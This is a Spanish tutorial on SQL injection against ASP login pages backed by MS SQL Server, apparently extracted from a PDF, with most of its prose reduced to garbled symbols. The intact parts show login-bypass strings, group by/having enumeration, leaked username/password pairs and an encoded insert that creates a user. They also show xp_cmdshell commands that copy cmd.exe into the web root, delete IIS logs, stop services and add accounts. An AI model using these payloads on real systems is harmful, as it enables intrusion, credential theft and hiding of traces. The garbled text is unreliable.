Documentos de Académico
Documentos de Profesional
Documentos de Cultura
! "
#$%& ( '
) " * +"
,-
# . / "0#$%
' " , *
) 1 % )" + ! " , *
, ") - **
2 #$% ' "- " "
3 #$% 4
) 5
, ! )
%" "
5 " 67" ) " " " . "
* 8* " ! 6 . "
. 5 9 ", # #$% 4
:) *
* + ;7 " /
#. ; , "
8< + " " = "
" " ) "
>; ) - " .>
5 ", "
4 ' " ; "
4 # ! " 8< # ! "
4 ! ', *
? #$% 4 : "- " " , "
@ ' "
' " "A "
B * "+% "' "
C ; "
A " "' ) "
5. "
"" #
" $
!% & '
5 * " D C 2 . " " ) 4 ) " ) "
6 " . - ' & )4 6 " . 4
" * 9 " * " 9 ") " " "& 9
" 9 ( " ) 4 ( ) "
& " * ) " * . "
4 " "
% " + 4 " . 4
#8$ 8% ># 8 . " $ + % . . > * 6
* 6 7 " D C & #8$ 8% +
* & 6 " . "& #$% E# $ + % . . F
( ) * # +,
$ ( " " " " " ) " " " 9 - + " *&
) 4 ) 4 " " 9 " = " " = ,:# ! 9
"& 9 " * " & " ) ) 4 9 " 6 "
2 G " E, . * & " 6 " " " "
"" F& " * ) " D= " " ) " ) :# & " " " )
" ) " . " 6 " !' " "
%51
3
"- .# / ! 0
%# )
; . "& ". " *
" " "" + " 6 "& 9 4
" " #0#$%& " "* " * & 4
" " "& 9 ) " . 6 "
( 1 ( * $# + )
#0#$% " < " " "& ) = " 1 % )"
6 L"& " 4 " "
. " " < " " ) 4 "
+ ( & ,#))
; , 6 % * " >; ! * . " *
#$% # 6 > O#$% # 6 "* " " " , ") "
- ** " " " > 8" ". * 9 1: < " 6 "& "
9 " " * * " + " "
6
! -"""
% & +% + % ! .# . &
/ 51; ( . " "
8H:R8 ( 6 " "
,81S ( . "
% & ++ + + ) .# . &
' 85;8 ( 6 " ) "& " = "
, :! 8 ) " = "
( * " ) " . . "
5%;8
) * " "
% & + + #! .# . &
( " ." " ) " "9
#8%8';
" "* .
( . " " ) " "
1#8 ;
J
( * "6 " " "+
!,5;8
." " " * "
( ." " ) ) "
,8%8;8
"
%! # #!
% " " "" " * ( " * " "9
" "
%! # #!
( " * ) " 6
A :
" " ." "
( " * " "9 )
G 8 8
" ." "9 " 6 "
( " " ." "" "
/ : ! -S
. " " =* "
( < " 9 ) " "*
5H 1/
.
( " ." "" "
: ,8 -S
" *
B
3 % &
T 9
U + 9
TU ,"
TV . 9
UV + . 9
V . 9
-8;G881 ( " * 6 6 "
% R8 (
1 ( " * ." " ) " "
4 & !
"5
#
# 67 " 9 . ( . * " 9 "& " .
" = " . " " >5 9 "
H ) " ' 8 >& " 9 * 6 & " "9
") & & " " " #$% ) "&
C
0 8* " ! 6 . "
05 9 ", # #$% 4
0 :) *
0 8< + " " = "
0' " ; "
( 6!
# ) 7 >#$% 4 > " ) J
) " " " * #0#$%& "9 . "
9 " & " & 9
" " 9 )
. < 7<
8" ". * 9 " " ) " " " " " " 6
( " . " "* "9 6 " " < " * "& "
9 &. " ". *
8" " 6 " " " =*
" "9 + "" "G " * # 6 "
4 " ) " " 5#! ) " " " #0
#$%& " " " G " 9 *
" 6 " )
+ 4! $ (! &
5 9 " =" " 9 " "
" 6 ) &* " ( " " "
+ .= " " " < 7< "
8 9 + = " " " ) ) " )9
( 6 & "9 ) 4 " "
" 9 "9 " " " "
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
Usuario : An'gel
Password : 338xD
username = 'An'
edicion = 'N'
1 $ %
&
' (#)*
+! , -. , / %
0 ,
, 123
% &
- & ) " 6 9 * & " " " &
" ) " " " ) ) "
* "" " ) " " + "& . "
" I " + = " " "& + "9 " .
& " ( .J ) " E! * >. . >F
) " "9 " ." > . " > )
" "" . "" >% " ' ">
)4 6 6
6 !8 ( 7 .
"6
" 7 " #$% 4 " & " * " 9
. " 9 " " "& 9 . " "
; %& 5#!& & " " " 6 ( 9 " < #$%
# 6 ' " 9 " ) "& "& .J "
6 ) & " & 4 & . " + ) 4 *
& 6 " "* " EH > % " ' ">F
# )
& " > 6 " > + = " " " = "
* "6 & " " . 9 " ) ) + = " " " " "
9 & 4 & " " . " . " " "
) "=
$ (! 6) $ (! ) & 3(
! . " " & #
86 " : 0% & "
, " "+
" " "
* " .= & ! . "
" " .= "& : 0%
" " " D " 9
" 6" + ) " < "
"+* " " " "
- & 9 4 4 4
) " . "
"" " . *= 4 " " " " " "" "
" " " ) "& 9
" " "& " . "
" 6"
* .
5 " "
" " & )
) *
/ = "+ "
"& ) . " "
+ * "& " " ) 6 " "
"
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto -------------------------------------------
1 ( ,
0 4
Usuario : 'OR''='
Password : 'OR''='
5
4/
Usuario : Admin'--
Password : 'or 1=1--
) 4) # $ 7! . ! #
5 " " " " "* " <
#$% + . & " 6 " ) 9 6
6 . " " ) " * " " " " .9
" "
17 ! $ 7! . % #
' ; #$% # 6 & + " 6
"" 6 & " 6 . " " 6
##$%#8 H8 & " >
" < >< Q "
) & " ) +> > " " "
" ) " " #$% # 6
. 6 9# + &
% " 9 " , . # 6 & . &" " " D " &
" 6" " " " " E' = " 5 F
" " E8 " " * 9 " 9 " .
) " = "& 4 " " 6
" ( + ( & F
1 $ % %
+ 67 & 4/
) . $
: 3( ) & ! #&
! ) ) " * " " " " (
7 " #$% 4 & " " ") " 9 )
" " :,-' :%8 ,- 4 " #$% # 6 .
( D "
1 8 .1)
1 3
%
)
010.8#* - "3.9$
(")-#) :;<<
123
----- Fragmento -----------------------------------------
<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
* Modified by XXXXXXXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class DB_Sql {
var $Host = "";
var $Database = "";
var $User = "";
var $Password = "";
var $UseODBCCursor = 0;
var $Link_ID = 0;
var $Query_ID = 0;
var $Record = array();
var $Row = 0;
var $Errno = 0;
var $Error = "";
----- Fragmento -----------------------------------------
: ) & * / !
:M& 6 " " 9 + #$% + "
* 6 " ) " " ) "
"& * .
+ " " " ) 9 4 * "
+ . & " 9 4 " " ) " 6 +
.
8 " " 6 " " " " ( &
" ( 7 " #$% 4 & "
"
' "
' + " * " " ;;! *
& ( " ** * E8 " " * # +1 & "
8 9 F& . . " ) )4 6 . "
) " + " D " * " E5 . ) " " " F& " 6
" "
8" * "
1 .
$ " =
3 )*1(
5*'>
! + 4
\ ' # Z
] ! +' Z2-
, "! " Z25
OO 8" [ Z
V #. . Z2,
& ' Z '
E ! 7 "" Z B
F ! 7 "" Z C
U + Z28
T Z2'
5 )
!
[ " Z -
0 " 0
^ - M# " Z?'
Q " Q
8 "
#! ! *
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1
#! ! *
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1--
#! ! *
Object Moved
This object may be found here.
:M 9 =&
" )" 6 " + )
". > " "8 > 8 9
" " 9 & ) " . * ) " . "
> > " ( " #8%8'; . E/ "1
F A=4 " 9 " " !:#; ;;! 1: " &" 9
" " " 6 . " " " "
) " "& 4 6 9 #$% 6
+
E8" " L. )+ " " " ,& " " ,& " "1 ) & " "8
6 . V 00F
' & . " " " "" . " 9 ;:,:# " "
) " " #8%8'; . & " "&
9 + 9 " " " " #8%8'; " + 9 *
" " II 6 " 4 < " #
9 " * " " .
- 9 " "
" III H "& ( " +
> "> = 9 ) "" " # * " (
" " . & " "
+ % . " 1 :1 " . + 9
" " " & " " " " ) " ""
#S#:-b8';# + #S#':% 1# " > ,> * 9
" ) " 6 (
" ;:! E8 " " F % " " " (
1 6 9 " " 6 " #8%8';
7 " "& "= * 9 ) 6 " "
B
:- .# ! #& +
4; ! * #! ! !< !& ! (!
6 ( #$%& (
" " " . " * ) "
" )4 6 & ( . " " 7 " 9 " ) "
= (! , 8 .=
# . "& >) " > ) " " "
. & " "9 6 ) "
" " A=4 " 9 * . " ) *
* 4 . " " "" ) " " 6 &
( 7 " " " "
> $6 3 / (! 6#; !
-> $6 3 , 8 . ! (! 6#; !
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
- 6! !
; " " "" " " " " . &" " "
" 6 " " " . 6 ) " """ "&
"& 9 ( 6 "9 . * &
" " 5 " " " "
") " "9 " * & . .
." " " ) " "
$+6 4
+4 4 4
1 4
5"= " & " 9 <" " " " 1#8 ; "
" 9 " ) " & 4 * " + &
". = 9 " " " "
( " !:#; 6= :)6 7< " +
. * 9 " + . &
" ) " " " "+" " " 6 " "
txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L] " " "6 " EL + " L&L +! "" LF00
% & & ! !
" . " . " ! " )
( . " 7 "" " #$% 4 " " "(
" " " * " * &
) " 6" II * 6 1: " " .
& " "* "9 " * #$% # 6
" >8< # ! "> "
< "
$ # ?4; $ #
% " " < " " " & ,%%L" 9 < " "
) " " " " & " "
" " 8< " " " " < "&
6 " #0#$%& " ") *
" 5 . " "& #0#$% ) ") .
2@
! "
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'
! 6 9 6
EXEC master..xp_cmdshell 'type
c:\inetpub\wwwroot\alguna_pagina.asp'
! " )
EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe
c:\inetpub\wwwroot\chroot.exe'
! ) "
EXEC master..xp_cmdshell 'DIR
c:\winnt\system32\logfiles\w3svc1\'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicacin en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:\winnt\system32\logfiles\w3svc1\
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicacin en
World Wide Web"'
! 6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
! " 6 G "
EXEC master..xp_cmdshell 'NET USER username password'
- $ %+ )
% " & * " & " " " +
" " ) " " "+ 7 " . " " #$%
4 & * + " ' " ) 4
) " " & 4 " " 9
* ( " " " ( 4
" > * >
;
" Q . &c " &
)4 M : ;! ;
`& < a
;
" Q )4 M &
`& 6 : ;! ; a
`&` Va ` : ;! ; a
` aa
" 3 , +
5 ) "
* . >; : G )5 # +! 4 > "
" 7 . " " ) " " #$% 4 +
") " " " " "
0 *
# L 1;: : ;A %8L
' > >
% + = " "+ ) = " " J "" "
3
03 !
# )" " ") "
1 :1 " )
H " " " E *Q* KF
1 " J "" "
0 +,-
# )" " ") "
1 :1 " )
! "5 "
1 " J "" "
0$ .
# ':!S E8 " " F
# )" " ") "
1 :1 " )
! "5 "
J "" "" " ) "K
0
# )" " ") "
1 :1 " )
! "5 "
J "" "" " ) "K
" " "" " " " *
E< Q " &" Q " F
"@ % &
7 . " ( 6 # 6 ! M ""
6 " "9 " " 6
7 . " ( " J " " "" 6
" "9 " " 6
! 4 *=" " "" 6 " ) " "
8" ) ( ! = ' ( A " 6=
# * * " " < " " = " 8"
+ " ;'! 322 + ,! 323F
1 " " 6 " ) " " 6 ) " "
1 " " = & " 6 #$% " 6
" "
3
"A % B !
"D !
M <
M " " + * " M M
M " " + .' M " #9 )* (
33
"B % ! (
01 (
, :! "9 " " )+ 1
0 " . II )+ 5 .
0' ' % . " " F )+ 6
0S " * " ) " "
") "I )+ 5 . 59 =
6. &